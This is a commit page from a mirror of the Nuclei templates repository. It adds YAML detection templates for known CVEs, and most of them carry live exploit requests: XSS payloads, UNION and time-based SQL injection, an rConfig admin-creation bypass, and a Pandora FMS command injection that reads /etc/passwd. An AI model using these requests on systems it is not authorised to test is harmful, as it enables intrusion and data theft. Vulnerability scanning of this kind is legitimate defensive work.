daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

templates added

patch-1
Prince Chaddha 2023-10-17 12:50:28 +05:30
parent f08daa5e82
commit 1b2fddb9cb
155 changed files with 6282 additions and 90 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
http/cve/2023/CVE-2023-37728.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2023-37728
info:
name: Icewarp Icearp v10.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
shodan-query: http.favicon.hash:2144485375
tags: cve,cve2023,icearp,icewarp,xss
http:
- method: GET
path:
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
- 'contains(body, "<img src onerror=alert(document.domain)>")'
condition: and

38
http/cves/2015/CVE-2015-20067.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2015-20067
info:
name: WP Attachment Export < 0.2.4 - Unrestricted File Download
author: r3Y3r53
severity: high
description: |
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
reference:
- https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
- https://packetstormsecurity.com/files/132693/
- https://seclists.org/fulldisclosure/2015/Jul/73
- https://nvd.nist.gov/vuln/detail/CVE-2015-20067
classification:
cve-id: CVE-2015-20067
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: 862
metadata:
max-request: 2
verified: true
tags: cve,cve2015,wordpress,wp,wp-plugin,access,control,unauth
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
- "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/xml")'
- 'contains_all(body, "title","wp:author_id","wp:author_email")'
condition: and

48
http/cves/2018/CVE-2018-7282.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2018-7282
info:
name: TITool PrintMonitor - Blind SQL Injection
author: theamanrawat
severity: critical
description: |
The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
remediation: Upgrade to PM18.2.1.
reference:
- https://fenceposterror.github.io/cve-2018-7282.txt
- https://nvd.nist.gov/vuln/detail/CVE-2018-7282
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7282
cwe-id: CWE-89
metadata:
verified: "true"
shodan-query: title:"PrintMonitor"
max-request: 1
cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:*
vendor: titool
product": printmonitor
tags: cve,cve2018,sqli,printmonitor,unauth
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
http:
- raw:
- |
@timeout: 20s
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en
host-redirects: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "PrintMonitor") && contains(header, "text/html")'
condition: and

37
http/cves/2019/CVE-2019-15829.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2019-15829
info:
name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/9443
- https://nvd.nist.gov/vuln/detail/CVE-2019-15829
metadata:
max-request: 2
verified: true
tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "post galleries!")'
condition: and

34
http/cves/2020/CVE-2020-10220.yaml
View File

@ -1,49 +1,39 @@
id: CVE-2020-10220
info:
name: rConfig 3.9 - SQL injection
author: ritikchaddha
name: rConfig 3.9 - SQL Injection
author: theamanrawat
severity: critical
description: |
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
remediation: |
Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://www.exploit-db.com/exploits/48208
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
- http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
- http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
- https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10220
cwe-id: CWE-89
epss-score: 0.02204
epss-percentile: 0.88193
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: rconfig
product: rconfig
shodan-query: title:"rConfig"
tags: packetstorm,cve,cve2020,rconfig,sqli
shodan-query: http.title:"rConfig"
tags: cve,cve2020,rconfig,sqli
variables:
num: "999999999"
num: 999999999
http:
- raw:
- |
GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
Host: {{Hostname}}
- method: GET
path:
- "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- "{{md5(num)}}"
- type: status
status:

48
http/cves/2020/CVE-2020-12256.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2020-12256
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12256
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-12256
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.title:"rConfig"
max-request: 1
tags: cve,cve2020,rconfig,authenticated,xss
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition: and

48
http/cves/2020/CVE-2020-12259.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2020-12259
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-12259
cwe-id: CWE-79
metadata:
verified: "true"
shodan-query: http.title:"rConfig"
max-request: 1
tags: cve,cve2020,rconfig,authenticated,xss
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition: and

95
http/cves/2020/CVE-2020-13638.yaml Normal file
View File

@ -0,0 +1,95 @@
id: CVE-2020-13638
info:
name: rConfig 3.9 - Authentication Bypass(Admin Login)
author: theamanrawat
severity: critical
description: |
lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13638
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-13638
cwe-id: CWE-89
metadata:
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2020,rconfig,authenticatio-bypass,escalation
variables:
username: "{{to_lower(rand_text_alpha(5))}}"
password: "{{rand_text_alphanumeric(12)}}!"
email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
http:
- raw:
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="username"
{{username}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="passconf"
{{password}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="password"
{{password}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
{{email}}
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="add"
add
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="ulevelid"
9
--01b28e152ee044338224bf647275f8eb--
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
cookie-reuse: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- "rConfig - Configuration Management"
- "Logged in as"
- "dashboadFieldSet"
condition: and
- type: word
part: header_3
words:
- 'text/html'
- type: status
status:
- 200

46
http/cves/2020/CVE-2020-13851.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2020-13851
info:
name: Artica Pandora FMS 7.44 - Remote Code Execution
author: theamanrawat
severity: high
description: |
Artica Pandora FMS 7.44 allows remote command execution via the events feature.
reference:
- https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-13851
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-13851
cwe-id: CWE-78
metadata:
verified: "true"
shodan-query: title:"Pandora FMS"
max-request: 1
tags: cve,cve2020,rce,pandora,unauth,artica
http:
- raw:
- |
POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: header
words:
- "text/html"
- "PHPSESSID="
condition: and
- type: status
status:
- 200

56
http/cves/2020/CVE-2020-8615.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2020-8615
info:
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
author: r3Y3r53
severity: medium
description: |
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
remediation: update to v.1.5.3
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-8615
- https://wpscan.com/vulnerability/10058
- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
cvss-score: 6.5
cwe-id: CWE-352
cve-id: CVE-2020-8615
cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/tutor/"
tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "application/json")'
- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
- 'status_code_2 == 200'
condition: and

45
http/cves/2021/CVE-2021-24215.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2021-24215
info:
name: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation
author: r3Y3r53
severity: critical
description: |
An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource.
remediation: Fixed in version 1.5.2
reference:
- https://wpscan.com/vulnerability/eec0f29f-a985-4285-8eed-d1855d204a20
- https://nvd.nist.gov/vuln/detail/CVE-2021-24215
- https://www.opencve.io/cve/CVE-2021-24215
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-284
cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/controlled-admin-access/"
tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")'
condition: and

45
http/cves/2021/CVE-2021-24286.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2021-24286
info:
name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
remediation: Fixed in version 1.3.1
reference:
- https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27
- https://www.exploit-db.com/exploits/50350
- https://nvd.nist.gov/vuln/detail/CVE-2021-24286
- https://wordpress.org/plugins/redirect-404-to-parent/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")'
- 'status_code_2 == 200'
condition: and

57
http/cves/2021/CVE-2021-24627.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2021-24627
info:
name: G Auto-Hyperlink <= 1.0.1 - SQL Injection
author: theamanrawat
severity: high
description: |
The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection
reference:
- https://wordpress.org/plugins/g-auto-hyperlink/
- https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb
- https://nvd.nist.gov/vuln/detail/CVE-2021-24627
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24627
cwe-id: CWE-89
metadata:
verified: true
publicwww-query: "/wp-content/plugins/g-auto-hyperlink/"
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated
variables:
num: 999999999
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+I
- |
GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- "Keyword"
- "g-auto-hyperlink-edit"
condition: and
- type: word
part: header_2
words:
- "text/html"
- type: status
status:
- 200

46
http/cves/2021/CVE-2021-24791.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2021-24791
info:
name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection
author: r3Y3r53
severity: high
description: |
The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections
remediation: Fixed in version 1.1.14
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24791
- https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f
- https://wordpress.org/plugins/header-footer-code-manager/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24791
cwe-id: CWE-89
metadata:
verified: true
google-query: inurl: "/plugins/header-footer-code-manager/"
max-request: 1
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 20s
GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2,"Add New Snippet")'
condition: and

53
http/cves/2021/CVE-2021-24915.yaml Normal file
View File

@ -0,0 +1,53 @@
id: CVE-2021-24915
info:
name: Contest Gallery < 13.1.0.6 - SQL injection
author: r3Y3r53
severity: critical
description: |
The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.
remediation: Fixed in version 13.1.0.6
reference:
- https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac
- https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917
- https://wordpress.org/plugins/contest-gallery/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24915
cwe-id: CWE-89
metadata:
max-request: 1
verified: true
public-query: "/wp-content/plugins/contest-gallery/"
tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery
http:
- raw:
- |
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WpUserId'
- 'Username'
- 'Usermail'
condition: and
- type: word
part: header
words:
- 'text/csv'
- 'filename='
condition: and
- type: status
status:
- 200

45
http/cves/2021/CVE-2021-24979.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2021-24979
info:
name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting
remediation: version 2.6.6
reference:
- https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79
- https://nvd.nist.gov/vuln/detail/CVE-2021-24979
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24979
cwe-id: CWE-79
metadata:
verified: true
publicwww-query: "/wp-content/plugins/paid-memberships-pro/"
max-request: 1
tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")'
condition: and

49
http/cves/2021/CVE-2021-25016.yaml
View File

@ -1,32 +1,17 @@
id: CVE-2021-25016
info:
name: Chaty < 2.8.2 - Cross-Site Scripting
author: luisfelipe146
name: Chaty Free < 2.8.3 & Pro < 2.8.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
remediation: Fixed in 2.8.3
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25016
cwe-id: CWE-79
epss-score: 0.00095
epss-percentile: 0.39536
cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: premio
product: chaty
framework: wordpress
publicwww-query: "/wp-content/plugins/chaty/"
tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty
tags: cve,cve2023,wpscan,wordpress,authenticated,wp-plugin,xss,chaty
http:
- raw:
@ -36,26 +21,18 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "search=</script><img src onerror=alert(document.domain)>"
- "chaty_page_chaty"
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "Chaty")'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

38
http/cves/2021/CVE-2021-25079.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-25079
info:
name: Contact Form Entries < 1.2.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
remediation: Fixed in version 1.1.7
reference:
- https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
- https://nvd.nist.gov/vuln/detail/CVE-2021-25079
- https://wordpress.org/plugins/contact-form-entries/
metadata:
verified: true
max-request: 2
tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"
condition: and

54
http/cves/2021/CVE-2021-29006.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2021-29006
info:
name: rConfig 3.9.6 - Local File Inclusion
author: r3Y3r53
severity: medium
description: |
rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.
reference:
- https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py
